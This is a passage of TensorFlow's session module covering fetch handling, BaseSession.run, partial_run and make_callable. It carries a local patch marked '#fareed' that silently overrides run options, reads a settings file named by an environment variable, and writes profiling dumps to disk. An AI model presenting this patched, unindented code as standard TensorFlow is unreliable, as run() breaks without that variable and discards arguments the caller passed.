This is the fetch mapper used for leaves in the fetch struct. Because of
the expansions mechanism, a leaf can actually fetch more than one tensor.
Also note that the fetches here can be just strings (tensor or op names) or
any other object that the graph knows how to convert to a tensor, such as a
Variable. So we have to run each fetch through `as_graph_element()` to get
the corresponding tensor or op.
Args:
fetches: List of objects, as returned by a fetch_fn defined in
_REGISTERED_EXPANSIONS.
contraction_fn: Callable as returned by a fetch_fn.
"""
self._unique_fetches = []
for fetch in fetches:
try:
self._unique_fetches.append(ops.get_default_graph().as_graph_element(
fetch, allow_tensor=True, allow_operation=True))
except TypeError as e:
raise TypeError('Fetch argument %r has invalid type %r, '
'must be a string or Tensor. (%s)' %
(fetch, type(fetch), str(e)))
except ValueError as e:
raise ValueError('Fetch argument %r cannot be interpreted as a '
'Tensor. (%s)' % (fetch, str(e)))
except KeyError as e:
raise ValueError('Fetch argument %r cannot be interpreted as a '
'Tensor. (%s)' % (fetch, str(e)))
self._contraction_fn = contraction_fn
def unique_fetches(self):
return self._unique_fetches
def build_results(self, values):
if not values:
# 'Operation' case
return None
else:
return self._contraction_fn(values)
def _uniquify_fetches(fetch_mappers):
"""Uniquifies fetches from a list of fetch_mappers.
This is a utility function used by _ListFetchMapper and _DictFetchMapper. It
gathers all the unique fetches from a list of mappers and builds a list
containing all of them but without duplicates (unique_fetches).
It also returns a 2-D list of integers (values_indices) indicating at which
index in unique_fetches the fetches of the mappers are located.
This list is as follows:
values_indices[mapper_index][mapper_fetch_index] = unique_fetches_index
Args:
fetch_mappers: list of fetch mappers.
Returns:
A list of fetches.
A 2-D list of integers.
"""
unique_fetches = []
value_indices = []
seen_fetches = object_identity.ObjectIdentityDictionary()
for m in fetch_mappers:
m_value_indices = []
for f in m.unique_fetches():
j = seen_fetches.get(f)
if j is None:
j = len(seen_fetches)
seen_fetches[f] = j
unique_fetches.append(f)
m_value_indices.append(j)
value_indices.append(m_value_indices)
return unique_fetches, value_indices
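# Tiny illustrative example of the bookkeeping above: if mapper A fetches
# [t1, t2] and mapper B fetches [t2, t3], then unique_fetches == [t1, t2, t3]
# and value_indices == [[0, 1], [1, 2]].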
class _ListFetchMapper(_FetchMapper):
"""Fetch mapper for lists, tuples, and namedtuples."""
def __init__(self, fetches):
"""Creates a _ListFetchMapper.
Args:
fetches: List, tuple, or namedtuple of fetches.
"""
self._fetch_type = type(fetches)
self._mappers = [_FetchMapper.for_fetch(fetch) for fetch in fetches]
self._unique_fetches, self._value_indices = _uniquify_fetches(self._mappers)
def unique_fetches(self):
return self._unique_fetches
def build_results(self, values):
# Create the list of results for each mapper.
results = []
for m, vi in zip(self._mappers, self._value_indices):
results.append(m.build_results([values[j] for j in vi]))
# Return a value of the original type of the fetches.
if issubclass(self._fetch_type, list):
return results
elif self._fetch_type == tuple:
return tuple(results)
else:
# This is the code path for namedtuple.
return self._fetch_type(*results)
class _DictFetchMapper(_FetchMapper):
"""Fetch mapper for dicts."""
def __init__(self, fetches):
"""Creates a _DictFetchMapper.
Args:
fetches: Dict of fetches.
"""
self._fetch_type = type(fetches)
self._keys = fetches.keys()
self._mappers = [
_FetchMapper.for_fetch(fetch) for fetch in fetches.values()
]
self._unique_fetches, self._value_indices = _uniquify_fetches(self._mappers)
def unique_fetches(self):
return self._unique_fetches
def build_results(self, values):
results = self._fetch_type()
for k, m, vi in zip(self._keys, self._mappers, self._value_indices):
results[k] = m.build_results([values[j] for j in vi])
return results
class _AttrsFetchMapper(_FetchMapper):
"""Fetch mapper for attrs decorated classes."""
def __init__(self, fetches):
"""Creates a _AttrsFetchMapper.
Args:
fetches: An instance of an attrs decorated class.
"""
values = _get_attrs_values(fetches)
self._fetch_type = type(fetches)
self._mappers = [_FetchMapper.for_fetch(fetch) for fetch in values]
self._unique_fetches, self._value_indices = _uniquify_fetches(self._mappers)
def unique_fetches(self):
return self._unique_fetches
def build_results(self, values):
results = []
for m, vi in zip(self._mappers, self._value_indices):
results.append(m.build_results([values[j] for j in vi]))
return self._fetch_type(*results)
class _FetchHandler(object):
"""Handler for structured fetches.
Given a graph, a user-provided structure for fetches, and a feed dict, this
class takes care of generating a list of tensor names to fetch and op names
to run for a low level `run()` call.
Given the results of the low level run call, this class can also rebuild a
result structure matching the user-provided structure for fetches, but
containing the corresponding results.
"""
# TODO(touts): Make this class also take care of destructuring the feed
# dict instead of doing it in the callers.
def __init__(self, graph, fetches, feeds, feed_handles=None):
"""Creates a fetch handler.
Args:
graph: Graph of the fetches. Used to check for fetchability and to
convert all fetches to tensors or ops as needed.
fetches: An arbitrary fetch structure: singleton, list, tuple, namedtuple,
or dict.
feeds: A feed dict where keys are Tensors.
feed_handles: A dict from feed Tensors to TensorHandle objects used as
direct feeds.
"""
with graph.as_default():
self._fetch_mapper = _FetchMapper.for_fetch(fetches)
self._fetches = []
self._targets = []
self._feeds = feeds
self._feed_handles = (
feed_handles or object_identity.ObjectIdentityDictionary())
self._ops = []
self._fetch_handles = object_identity.ObjectIdentityDictionary()
for fetch in self._fetch_mapper.unique_fetches():
if isinstance(fetch, ops.Operation):
self._assert_fetchable(graph, fetch)
self._targets.append(fetch)
self._ops.append(True)
else:
self._assert_fetchable(graph, fetch.op)
self._fetches.append(fetch)
self._ops.append(False)
# Remember the fetch if it is for a tensor handle.
if (isinstance(fetch, ops.Tensor) and
(fetch.op.type == 'GetSessionHandle' or
fetch.op.type == 'GetSessionHandleV2')):
self._fetch_handles[fetch] = fetch.op.inputs[0].dtype
self._final_fetches = [x for x in self._fetches if x not in feeds]
def _assert_fetchable(self, graph, op):
if not graph.is_fetchable(op):
raise errors.InaccessibleTensorError(
'Operation %r has been marked as not fetchable. Typically this'
' happens when it is defined in another function or code block.'
          ' Use return values, explicit Python locals or TensorFlow collections'
' to access it.'
% op.name)
def fetches(self):
"""Return the unique names of tensors to fetch.
Returns:
A list of strings.
"""
return self._final_fetches
def targets(self):
"""Return the unique names of ops to run.
Returns:
A list of strings.
"""
return self._targets
def build_results(self, session, tensor_values):
"""Build results matching the original fetch shape.
`tensor_values` must be a list of the same length as
the one returned by `fetches()`, and holding the requested
fetch values.
This method builds a struct with the same shape as the original `fetches`
passed to the constructor, in which the fetches are replaced by their
fetched value.
Args:
session: The enclosing session. Used for tensor handles.
tensor_values: List of values matching the list returned by fetches().
Returns:
A structure of the same shape as the original `fetches` argument but
containing tensors or None (for fetched ops).
"""
full_values = []
assert len(self._final_fetches) == len(tensor_values)
i = 0
j = 0
for is_op in self._ops:
if is_op:
full_values.append(None)
else:
# If the fetch was in the feeds, use the fed value, otherwise
# use the returned value.
if self._fetches[i] in self._feed_handles:
# A fetch had a corresponding direct TensorHandle feed. Call eval()
# to obtain the Tensor value from the TensorHandle.
value = self._feed_handles[self._fetches[i]].eval()
else:
value = self._feeds.get(self._fetches[i])
if value is None:
value = tensor_values[j]
j += 1
dtype = self._fetch_handles.get(self._fetches[i])
if dtype:
full_values.append(session_ops.TensorHandle(value, dtype, session))
else:
full_values.append(value)
i += 1
assert j == len(tensor_values)
return self._fetch_mapper.build_results(full_values)
def _name_list(tensor_list):
"""Utility function for transitioning to the new session API.
Args:
tensor_list: a list of `Tensor`s.
Returns:
A list of each `Tensor`s name (as byte arrays).
"""
return [compat.as_bytes(t.name) for t in tensor_list]
class _DeviceAttributes(object):
"""Struct-like object describing a device's attributes.
Each device has 3 key properties:
- name: the fully-qualified TensorFlow path to the device. For
example: /job:worker/replica:0/task:3/device:CPU:0
- device_type: the type of the device (e.g. CPU, GPU, TPU, etc.)
- memory_limit_bytes: the maximum amount of memory available on the device
(in bytes).
"""
def __init__(self, name, device_type, memory_limit_bytes, incarnation):
self._name = device.canonical_name(name)
self._device_type = device_type
self._memory_limit_bytes = memory_limit_bytes
self._incarnation = incarnation
@property
def name(self):
return self._name
@property
def device_type(self):
return self._device_type
@property
def memory_limit_bytes(self):
return self._memory_limit_bytes
@property
def incarnation(self):
return self._incarnation
def __repr__(self):
return '_DeviceAttributes(%s, %s, %d, %d)' % (
self.name,
self.device_type,
self.memory_limit_bytes,
self.incarnation,
)
class BaseSession(SessionInterface):
"""A class for interacting with a TensorFlow computation.
The BaseSession enables incremental graph building with inline
execution of Operations and evaluation of Tensors.
"""
def __init__(self, target='', graph=None, config=None):
"""Constructs a new TensorFlow session.
Args:
target: (Optional) The TensorFlow execution engine to connect to.
graph: (Optional) The graph to be used. If this argument is None, the
default graph will be used.
config: (Optional) ConfigProto proto used to configure the session. If no
config is specified, the global default will be used. The global default
can be configured via the tf.config APIs.
Raises:
tf.errors.OpError: Or one of its subclasses if an error occurs while
creating the TensorFlow session.
TypeError: If one of the arguments has the wrong type.
"""
_python_session_create_counter.get_cell().increase_by(1)
if graph is None:
self._graph = ops.get_default_graph()
else:
if not isinstance(graph, ops.Graph):
raise TypeError('graph must be a tf.Graph, but got %s' % type(graph))
self._graph = graph
self._closed = False
if target is not None:
try:
self._target = compat.as_bytes(target)
except TypeError:
if isinstance(target, config_pb2.ConfigProto):
raise TypeError('target must be a string, but got %s.'
' Did you do "Session(config)" instead of'
' "Session(config=config)"?' % type(target))
raise TypeError('target must be a string, but got %s' % type(target))
else:
self._target = None
self._delete_lock = threading.Lock()
self._dead_handles = []
if config is None:
config = context.context().config
if not isinstance(config, config_pb2.ConfigProto):
raise TypeError('config must be a tf.ConfigProto, but got %s' %
type(config))
if (mixed_precision_global_state.mixed_precision_graph_rewrite_is_enabled
and config.graph_options.rewrite_options.auto_mixed_precision !=
rewriter_config_pb2.RewriterConfig.OFF):
new_config = config_pb2.ConfigProto()
new_config.CopyFrom(config)
new_config.graph_options.rewrite_options.auto_mixed_precision = (
rewriter_config_pb2.RewriterConfig.ON)
config = new_config
elif (config.graph_options.rewrite_options.auto_mixed_precision !=
rewriter_config_pb2.RewriterConfig.ON):
mixed_precision_global_state.non_mixed_precision_session_created = True
self._config = config
self._add_shapes = config.graph_options.infer_shapes
self._session = None
opts = tf_session.TF_NewSessionOptions(target=self._target, config=config)
try:
# pylint: disable=protected-access
self._session = tf_session.TF_NewSessionRef(self._graph._c_graph, opts)
# pylint: enable=protected-access
finally:
tf_session.TF_DeleteSessionOptions(opts)
def list_devices(self):
"""Lists available devices in this session.
```python
devices = sess.list_devices()
for d in devices:
print(d.name)
```
Where:
Each element in the list has the following properties
name: A string with the full name of the device. ex:
`/job:worker/replica:0/task:3/device:CPU:0`
device_type: The type of the device (e.g. `CPU`, `GPU`, `TPU`.)
memory_limit: The maximum amount of memory available on the device.
Note: depending on the device, it is possible the usable memory could
be substantially less.
Raises:
tf.errors.OpError: If it encounters an error (e.g. session is in an
invalid state, or network errors occur).
Returns:
A list of devices in the session.
"""
raw_device_list = tf_session.TF_SessionListDevices(self._session)
device_list = []
size = tf_session.TF_DeviceListCount(raw_device_list)
for i in range(size):
name = tf_session.TF_DeviceListName(raw_device_list, i)
device_type = tf_session.TF_DeviceListType(raw_device_list, i)
memory = tf_session.TF_DeviceListMemoryBytes(raw_device_list, i)
incarnation = tf_session.TF_DeviceListIncarnation(raw_device_list, i)
device_list.append(
_DeviceAttributes(name, device_type, memory, incarnation))
tf_session.TF_DeleteDeviceList(raw_device_list)
return device_list
def close(self):
"""Closes this session.
Calling this method frees all resources associated with the session.
Raises:
tf.errors.OpError: Or one of its subclasses if an error occurs while
closing the TensorFlow session.
"""
if self._session and not self._closed:
self._closed = True
tf_session.TF_CloseSession(self._session)
def __del__(self):
# cleanly ignore all exceptions
try:
self.close()
except Exception: # pylint: disable=broad-except
pass
if self._session is not None:
try:
tf_session.TF_DeleteSession(self._session)
except (AttributeError, TypeError):
# At shutdown, `c_api_util`, `tf_session`, or
# `tf_session.TF_DeleteSession` may have been garbage collected, causing
# the above method calls to fail. In this case, silently leak since the
# program is about to terminate anyway.
pass
self._session = None
@property
def graph(self):
"""The graph that was launched in this session."""
return self._graph
@property
def graph_def(self):
"""A serializable version of the underlying TensorFlow graph.
Returns:
A graph_pb2.GraphDef proto containing nodes for all of the Operations in
the underlying TensorFlow graph.
"""
return self._graph.as_graph_def(add_shapes=self._add_shapes)
@property
def sess_str(self):
return self._target
def as_default(self):
"""Returns a context manager that makes this object the default session.
Use with the `with` keyword to specify that calls to
`tf.Operation.run` or `tf.Tensor.eval` should be executed in
this session.
```python
c = tf.constant(..)
sess = tf.compat.v1.Session()
with sess.as_default():
assert tf.compat.v1.get_default_session() is sess
print(c.eval())
```
To get the current default session, use `tf.compat.v1.get_default_session`.
*N.B.* The `as_default` context manager *does not* close the
session when you exit the context, and you must close the session
explicitly.
```python
c = tf.constant(...)
sess = tf.compat.v1.Session()
with sess.as_default():
print(c.eval())
# ...
with sess.as_default():
print(c.eval())
sess.close()
```
Alternatively, you can use `with tf.compat.v1.Session():` to create a
session that is automatically closed on exiting the context,
including when an uncaught exception is raised.
*N.B.* The default session is a property of the current thread. If you
create a new thread, and wish to use the default session in that
thread, you must explicitly add a `with sess.as_default():` in that
thread's function.
*N.B.* Entering a `with sess.as_default():` block does not affect
the current default graph. If you are using multiple graphs, and
`sess.graph` is different from the value of
`tf.compat.v1.get_default_graph`, you must explicitly enter a
`with sess.graph.as_default():` block to make `sess.graph` the default
graph.
Returns:
A context manager using this session as the default session.
"""
return ops.default_session(self)
def run(self, fetches, feed_dict=None, options=None, run_metadata=None):
"""Runs operations and evaluates tensors in `fetches`.
This method runs one "step" of TensorFlow computation, by
running the necessary graph fragment to execute every `Operation`
and evaluate every `Tensor` in `fetches`, substituting the values in
`feed_dict` for the corresponding input values.
The `fetches` argument may be a single graph element, or an arbitrarily
nested list, tuple, namedtuple, dict, or OrderedDict containing graph
elements at its leaves. A graph element can be one of the following types:
* A `tf.Operation`.
The corresponding fetched value will be `None`.
* A `tf.Tensor`.
The corresponding fetched value will be a numpy ndarray containing the
value of that tensor.
* A `tf.SparseTensor`.
The corresponding fetched value will be a
`tf.compat.v1.SparseTensorValue`
containing the value of that sparse tensor.
* A `get_tensor_handle` op. The corresponding fetched value will be a
numpy ndarray containing the handle of that tensor.
* A `string` which is the name of a tensor or operation in the graph.
The value returned by `run()` has the same shape as the `fetches` argument,
where the leaves are replaced by the corresponding values returned by
TensorFlow.
Example:
```python
a = tf.constant([10, 20])
b = tf.constant([1.0, 2.0])
# 'fetches' can be a singleton
v = session.run(a)
# v is the numpy array [10, 20]
# 'fetches' can be a list.
v = session.run([a, b])
# v is a Python list with 2 numpy arrays: the 1-D array [10, 20] and the
# 1-D array [1.0, 2.0]
# 'fetches' can be arbitrary lists, tuples, namedtuple, dicts:
MyData = collections.namedtuple('MyData', ['a', 'b'])
v = session.run({'k1': MyData(a, b), 'k2': [b, a]})
# v is a dict with
# v['k1'] is a MyData namedtuple with 'a' (the numpy array [10, 20]) and
# 'b' (the numpy array [1.0, 2.0])
# v['k2'] is a list with the numpy array [1.0, 2.0] and the numpy array
# [10, 20].
```
The optional `feed_dict` argument allows the caller to override
the value of tensors in the graph. Each key in `feed_dict` can be
one of the following types:
* If the key is a `tf.Tensor`, the
value may be a Python scalar, string, list, or numpy ndarray
that can be converted to the same `dtype` as that
tensor. Additionally, if the key is a
`tf.compat.v1.placeholder`, the shape of
the value will be checked for compatibility with the placeholder.
* If the key is a
`tf.SparseTensor`,
the value should be a
`tf.compat.v1.SparseTensorValue`.
* If the key is a nested tuple of `Tensor`s or `SparseTensor`s, the value
should be a nested tuple with the same structure that maps to their
corresponding values as above.
Each value in `feed_dict` must be convertible to a numpy array of the dtype
of the corresponding key.
The optional `options` argument expects a [`RunOptions`] proto. The options
allow controlling the behavior of this particular step (e.g. turning tracing
on).
The optional `run_metadata` argument expects a [`RunMetadata`] proto. When
appropriate, the non-Tensor output of this step will be collected there. For
example, when users turn on tracing in `options`, the profiled info will be
collected into this argument and passed back.
Args:
fetches: A single graph element, a list of graph elements, or a dictionary
whose values are graph elements or lists of graph elements (described
above).
feed_dict: A dictionary that maps graph elements to values (described
above).
options: A [`RunOptions`] protocol buffer
run_metadata: A [`RunMetadata`] protocol buffer
Returns:
Either a single value if `fetches` is a single graph element, or
a list of values if `fetches` is a list, or a dictionary with the
same keys as `fetches` if that is a dictionary (described above).
Order in which `fetches` operations are evaluated inside the call
is undefined.
Raises:
RuntimeError: If this `Session` is in an invalid state (e.g. has been
closed).
TypeError: If `fetches` or `feed_dict` keys are of an inappropriate type.
ValueError: If `fetches` or `feed_dict` keys are invalid or refer to a
`Tensor` that doesn't exist.
"""
#fareed
global the_settings_file_was_read
global training_itr
global profile
global profiling_path
if not the_settings_file_was_read:
the_settings_file_was_read = True
settings_path = os.environ['PARDNN_DIR']
with open(settings_path + 'settings.json', 'r') as f:
profiling_data = json.load(f)
      profile = profiling_data['profile'] == 1
profiling_path = profiling_data['profiling_path']
if profile:
      options = tf.RunOptions(
          trace_level=tf.RunOptions.SOFTWARE_TRACE,
          report_tensor_allocations_upon_oom=True)
run_metadata = tf.RunMetadata()
#if profile: run_metadata = tf.RunMetadata()
#end fareed
options_ptr = tf_session.TF_NewBufferFromString(
compat.as_bytes(options.SerializeToString())) if options else None
run_metadata_ptr = tf_session.TF_NewBuffer() if run_metadata else None
try:
result = self._run(None, fetches, feed_dict, options_ptr,
run_metadata_ptr)
if run_metadata:
proto_data = tf_session.TF_GetBuffer(run_metadata_ptr)
run_metadata.ParseFromString(compat.as_bytes(proto_data))
finally:
if run_metadata_ptr:
tf_session.TF_DeleteBuffer(run_metadata_ptr)
if options:
tf_session.TF_DeleteBuffer(options_ptr)
#fareed
if profile:
tf.debugging.set_log_device_placement(True)
if training_itr % 10 == 0:
dot_rep = graph_to_dot(tf.get_default_graph())
with open(profiling_path + 'mtf_dot.dot', 'w') as fwr:
fwr.write(str(dot_rep))
operations_tensors = {}
operations_attributes = {}
operations_names = tf.get_default_graph().get_operations()
count1 = 0
count2 = 0
for operation in operations_names:
operation_name = operation.name
operations_info = tf.get_default_graph().get_operation_by_name(operation_name).values()
try:
operations_attributes[operation_name] = []
operations_attributes[operation_name].append(operation.type)
operations_attributes[operation_name].append(tf.get_default_graph(
).get_tensor_by_name(operation_name + ':0').dtype._is_ref_dtype)
except:
pass
if len(operations_info) > 0:
if not (operations_info[0].shape.ndims is None):
operation_shape = operations_info[0].shape.as_list()
operation_dtype_size = operations_info[0].dtype.size
if not (operation_dtype_size is None):
operation_no_of_elements = 1
for dim in operation_shape:
if not(dim is None):
operation_no_of_elements = operation_no_of_elements * dim
total_size = operation_no_of_elements * operation_dtype_size
operations_tensors[operation_name] = total_size
else:
count1 = count1 + 1
else:
count1 = count1 + 1
operations_tensors[operation_name] = -1
else:
count2 = count2 + 1
operations_tensors[operation_name] = -1
with open(profiling_path+'tensors_sz_32.txt', 'w') as f:
for tensor, size in operations_tensors.items():
f.write('"' + tensor + '"::' + str(size) + '\n')
with open(profiling_path+'operations_attributes.txt', 'w') as f:
for op, attrs in operations_attributes.items():
strr = op
for attr in attrs:
strr += '::' + str(attr)
strr += '\n'
f.write(strr)
#end fareed
_profile(run_metadata, training_itr)
mem_options = tf.profiler.ProfileOptionBuilder.time_and_memory()
mem_options["min_bytes"] = 0
mem_options["min_micros"] = 0
mem_options["output"] = 'file:outfile=' + profiling_path + 'mem_' + str(training_itr) + '.txt'
mem_options["select"] = ("bytes", "peak_bytes", "output_bytes",
"residual_bytes")
mem = tf.profiler.profile(
tf.Graph(), run_meta=run_metadata, cmd="scope", options=mem_options)
#end fareed
#fareed
training_itr += 1
#end fareed
return result
def partial_run(self, handle, fetches, feed_dict=None):
"""Continues the execution with more feeds and fetches.
This is EXPERIMENTAL and subject to change.
To use partial execution, a user first calls `partial_run_setup()` and
then a sequence of `partial_run()`. `partial_run_setup` specifies the
list of feeds and fetches that will be used in the subsequent
`partial_run` calls.
The optional `feed_dict` argument allows the caller to override
the value of tensors in the graph. See run() for more information.
Below is a simple example:
```python
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
c = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
r2 = math_ops.multiply(r1, c)
h = sess.partial_run_setup([r1, r2], [a, b, c])
res = sess.partial_run(h, r1, feed_dict={a: 1, b: 2})
res = sess.partial_run(h, r2, feed_dict={c: res})
```
Args:
handle: A handle for a sequence of partial runs.
fetches: A single graph element, a list of graph elements, or a dictionary
whose values are graph elements or lists of graph elements (see
documentation for `run`).
feed_dict: A dictionary that maps graph elements to values (described
above).
Returns:
Either a single value if `fetches` is a single graph element, or
a list of values if `fetches` is a list, or a dictionary with the
same keys as `fetches` if that is a dictionary
(see documentation for `run`).
Raises:
tf.errors.OpError: Or one of its subclasses on error.
"""
# TODO(touts): Support feeding and fetching the same tensor.
return self._run(handle, fetches, feed_dict, None, None)
def partial_run_setup(self, fetches, feeds=None):
"""Sets up a graph with feeds and fetches for partial run.
This is EXPERIMENTAL and subject to change.
Note that contrary to `run`, `feeds` only specifies the graph elements.
The tensors will be supplied by the subsequent `partial_run` calls.
Args:
fetches: A single graph element, or a list of graph elements.
feeds: A single graph element, or a list of graph elements.
Returns:
A handle for partial run.
Raises:
RuntimeError: If this `Session` is in an invalid state (e.g. has been
closed).
TypeError: If `fetches` or `feed_dict` keys are of an inappropriate type.
tf.errors.OpError: Or one of its subclasses if a TensorFlow error happens.
"""
def _feed_fn(feed):
for tensor_type, _, _, feed_fn in _REGISTERED_EXPANSIONS:
if isinstance(feed, tensor_type):
return feed_fn(feed)
raise TypeError('Feed argument %r has invalid type %r' %
(feed, type(feed)))
# Check session.
if self._closed:
raise RuntimeError('Attempted to use a closed Session.')
if self.graph.version == 0:
raise RuntimeError('The Session graph is empty. Add operations to the '
'graph before calling run().')
if feeds is None:
feeds = []
# Create request.
feed_list = []
# Validate and process feed_list.
is_list_feed = isinstance(feeds, (list, tuple))
if not is_list_feed:
feeds = [feeds]
for feed in feeds:
for subfeed in _feed_fn(feed):
try:
subfeed_t = self.graph.as_graph_element(
subfeed, allow_tensor=True, allow_operation=False)
# pylint: disable=protected-access
feed_list.append(subfeed_t._as_tf_output())
# pylint: enable=protected-access
except Exception as e:
e.message = ('Cannot interpret feed_list key as Tensor: ' + e.message)
e.args = (e.message,)
raise e
# Validate and process fetches.
# TODO(touts): Support feeding and fetching the same tensor.
fetch_handler = _FetchHandler(self._graph, fetches,
object_identity.ObjectIdentityDictionary())
# Set up a graph with feeds and fetches for partial run.
def _setup_fn(session, feed_list, fetch_list, target_list):
self._extend_graph()
return tf_session.TF_SessionPRunSetup_wrapper(session, feed_list,
fetch_list, target_list)
# pylint: disable=protected-access
final_fetches = [t._as_tf_output() for t in fetch_handler.fetches()]
final_targets = [op._c_op for op in fetch_handler.targets()]
# pylint: enable=protected-access
return self._do_call(_setup_fn, self._session, feed_list, final_fetches,
final_targets)
def _run(self, handle, fetches, feed_dict, options, run_metadata):
"""Perform either run or partial_run, depending the presence of `handle`."""
def _feed_fn(feed, feed_val):
for tensor_type, _, feed_fn, _ in _REGISTERED_EXPANSIONS:
if isinstance(feed, tensor_type):
return feed_fn(feed, feed_val)
raise TypeError('Feed argument %r has invalid type %r' %
(feed, type(feed)))
# Check session.
if self._closed:
raise RuntimeError('Attempted to use a closed Session.')
if self.graph.version == 0:
raise RuntimeError('The Session graph is empty. Add operations to the '
'graph before calling run().')
# Create request.
feed_dict_tensor = object_identity.ObjectIdentityDictionary()
feed_map = {}
# Validate and process feed_dict.
feed_handles = {}
if feed_dict:
feed_dict = nest.flatten_dict_items(feed_dict)
for feed, feed_val in feed_dict.items():
for subfeed, subfeed_val in _feed_fn(feed, feed_val):
try:
subfeed_t = self.graph.as_graph_element(
subfeed, allow_tensor=True, allow_operation=False)
except Exception as e:
raise TypeError('Cannot interpret feed_dict key as Tensor: ' +
e.args[0])
if isinstance(subfeed_val, ops.Tensor):
raise TypeError('The value of a feed cannot be a tf.Tensor object. '
'Acceptable feed values include Python scalars, '
'strings, lists, numpy ndarrays, or TensorHandles. '
'For reference, the tensor object was ' +
str(feed_val) + ' which was passed to the '
'feed with key ' + str(feed) + '.')
subfeed_dtype = subfeed_t.dtype.as_numpy_dtype
if isinstance(subfeed_val, int) and _convert_to_numpy_obj(
subfeed_dtype, subfeed_val) != subfeed_val:
raise TypeError(
'Type of feed value ' + str(subfeed_val) + ' with type ' +
str(type(subfeed_val)) +
' is not compatible with Tensor type ' + str(subfeed_dtype) +
'. Try explicitly setting the type of the feed tensor'
' to a larger type (e.g. int64).')
is_tensor_handle_feed = isinstance(subfeed_val,
session_ops.TensorHandle)
if is_tensor_handle_feed:
np_val = subfeed_val.to_numpy_array()
feed_handles[subfeed_t] = subfeed_val
else:
np_val = np.asarray(subfeed_val, dtype=subfeed_dtype)
if (not is_tensor_handle_feed and
not subfeed_t.get_shape().is_compatible_with(np_val.shape)):
raise ValueError(
'Cannot feed value of shape %r for Tensor %r, '
'which has shape %r' %
(np_val.shape, subfeed_t.name, str(subfeed_t.get_shape())))
if not self.graph.is_feedable(subfeed_t):
raise ValueError('Tensor %s may not be fed.' % subfeed_t)
feed_dict_tensor[subfeed_t] = np_val
feed_map[compat.as_bytes(subfeed_t.name)] = (subfeed_t, subfeed_val)
# Create a fetch handler to take care of the structure of fetches.
fetch_handler = _FetchHandler(
self._graph, fetches, feed_dict_tensor, feed_handles=feed_handles)
# Run request and get response.
# We need to keep the returned movers alive for the following _do_run().
# These movers are no longer needed when _do_run() completes, and
# are deleted when `movers` goes out of scope when this _run() ends.
# TODO(yuanbyu, keveman): Revisit whether we should just treat feeding
# of a handle from a different device as an error.
_ = self._update_with_movers(feed_dict_tensor, feed_map)
final_fetches = fetch_handler.fetches()
final_targets = fetch_handler.targets()
# We only want to really perform the run if fetches or targets are provided,
# or if the call is a partial run that specifies feeds.
if final_fetches or final_targets or (handle and feed_dict_tensor):
results = self._do_run(handle, final_targets, final_fetches,
feed_dict_tensor, options, run_metadata)
else:
results = []
return fetch_handler.build_results(self, results)
def make_callable(self, fetches, feed_list=None, accept_options=False):
"""Returns a Python callable that runs a particular step.
The returned callable will take `len(feed_list)` arguments whose types
must be compatible with the respective elements of `feed_list`.
For example, if element `i` of `feed_list` is a `tf.Tensor`, the `i`th
argument to the returned callable must be a numpy ndarray (or something
convertible to an ndarray) with matching element type and shape. See
`tf.Session.run` for details of the allowable feed key and value types.
The returned callable will have the same return type as
`tf.Session.run(fetches, ...)`. For example, if `fetches` is a `tf.Tensor`,
the callable will return a numpy ndarray; if `fetches` is a `tf.Operation`,
it will return `None`.
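For example, a minimal sketch (the tensor names below are illustrative):
```python
x = tf.compat.v1.placeholder(tf.float32, shape=[2])
y = x * 2.0
with tf.compat.v1.Session() as sess:
  doubler = sess.make_callable(y, feed_list=[x])
  print(doubler([1.0, 2.0]))  # ~> [2. 4.]
```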
Args:
fetches: A value or list of values to fetch. See `tf.Session.run` for
details of the allowable fetch types.
feed_list: (Optional.) A list of `feed_dict` keys. See `tf.Session.run`
for details of the allowable feed key types.
accept_options: (Optional.) If `True`, the returned `Callable` will be
able to accept `tf.compat.v1.RunOptions` and `tf.compat.v1.RunMetadata`
as optional keyword arguments `options` and `run_metadata`,
respectively, with the same syntax and semantics as `tf.Session.run`,
which is useful for certain use cases (profiling and debugging) but will
result in measurable slowdown of the `Callable`'s
performance. Default: `False`.
Returns:
A function that when called will execute the step defined by
`feed_list` and `fetches` in this session.
Raises:
TypeError: If `fetches` or `feed_list` cannot be interpreted
as arguments to `tf.Session.run`.
"""
if feed_list is not None:
if not isinstance(feed_list, (list, tuple)):
raise TypeError('`feed_list` must be a list or tuple.')
# Delegate any non-empty feed lists to the existing `run()` logic.
# TODO(mrry): Refactor the feed handling logic from
# `Session._run()` so that we can convert the feeds to a list of
# strings here.
def _generic_run(*feed_args, **kwargs):
feed_dict = {
feed: feed_val for feed, feed_val in zip(feed_list, feed_args)
}
return self.run(fetches, feed_dict=feed_dict, **kwargs)
return _generic_run
# Ensure any changes to the graph are reflected in the runtime.
# Note that we don't need to do this on subsequent calls to the
# returned object, because the arguments to `fetches` must already be
# in the graph.
self._extend_graph()
# Create a fetch handler to take care of the structure of fetches.
fetch_handler = _FetchHandler(self._graph, fetches,
object_identity.ObjectIdentityDictionary())
# pylint: disable=protected-access
fetch_list = [t._as_tf_output() for t in fetch_handler.fetches()]
target_list = [op._c_op for op in fetch_handler.targets()]
# pylint: enable=protected-access
def _callable_template_with_options_and_metadata(fetch_list,
target_list,
fetch_handler,
options=None,
run_metadata=None):
"""Template callable that accepts RunOptions and RunMetadata."""
options_ptr = tf_session.TF_NewBufferFromString(
compat.as_bytes(options.SerializeToString())) if options else None
run_metadata_ptr = tf_session.TF_NewBuffer() if run_metadata else None
try:
results = self._call_tf_sessionrun(options_ptr, {}, fetch_list,
target_list, run_metadata_ptr)
if fetch_handler:
results = fetch_handler.build_results(self, results)
else:
results = results[0] if results else None
if run_metadata:
proto_data = tf_session.TF_GetBuffer(run_metadata_ptr)
run_metadata.ParseFromString(compat.as_bytes(proto_data))
finally:
if run_metadata_ptr:
tf_session.TF_DeleteBuffer(run_metadata_ptr)
if options:
tf_session.TF_DeleteBuffer(options_ptr)
return results
if accept_options:
return functools.partial(_callable_template_with_options_and_metadata,
fetch_list, target_list, fetch_handler)
elif isinstance(fetches, ops.Operation):
# Special case for fetching a single operation, because the
# function will have no return value.
assert not fetch_list
assert len(target_list) == 1
def _single_operation_run():
self._call_tf_sessionrun(None, {}, [], target_list, None)
return _single_operation_run
elif isinstance(fetches, ops.Tensor):
# Special case for fetching a single tensor, because the
# function can return the result of `TF_Run()` directly.
assert len(fetch_list) == 1
assert not target_list
def _single_tensor_run():
results = self._call_tf_sessionrun(None, {}, fetch_list, [], None)
return results[0]
return _single_tensor_run
else:
# In all other cases, we must use `fetch_handler` to build the
# results for us.
def _fetch_handler_run():
